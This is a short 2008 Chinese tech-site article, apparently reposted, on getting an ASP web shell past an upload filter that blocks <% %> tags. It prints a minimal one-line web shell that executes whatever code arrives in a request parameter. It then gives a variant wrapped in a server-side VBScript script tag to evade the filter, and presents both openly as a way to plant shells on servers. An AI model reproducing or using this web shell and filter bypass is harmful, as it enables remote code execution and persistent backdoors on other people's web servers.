当碰到不能使用asp标记的时候

时间:2008-10-07 12:16:14  来源:第二电脑网上收集  作者:

  第二电脑网导读:><%execute request("l")%> 我们来把他的标签换下来: <script language=VBScript runat=server>execute request("l")</Script> 呵呵!这样就避开了使用<%%>,保存为.asp,程序照样执行,效果一样的说! ...
  正文: 以前好多朋友说过就是在程序上传shell过程中,程序不允许包含<%%>标记符号的内容的文件上传,这样就有好多shell不能上传上去了!那我们是不就没别的方法了么,当然有了!呵呵!

我们拿蓝屏最小的ASP/ target=_blank class=infotextkey>asp代码来看下:

<%execute request("l")%>

我们来把他的标签换下来:

<script language=vbScript runat=server>execute request("l")</Script>

呵呵!这样就避开了使用<%%>,保存为.asp,程序照样执行,效果一样的说!

当碰到不能使用asp标记的时候》由第二电脑网原创提供,转载请注明:http://www.002pc.com/master/College/Programming/ASP/2008-10-07/3309.html


关键字:

关于《当碰到不能使用asp标记的时候》文章的评论

站内搜索: 高级搜索

热门搜索: Windows style 系统 tr IP QQ CPU 安装 function 注册 if td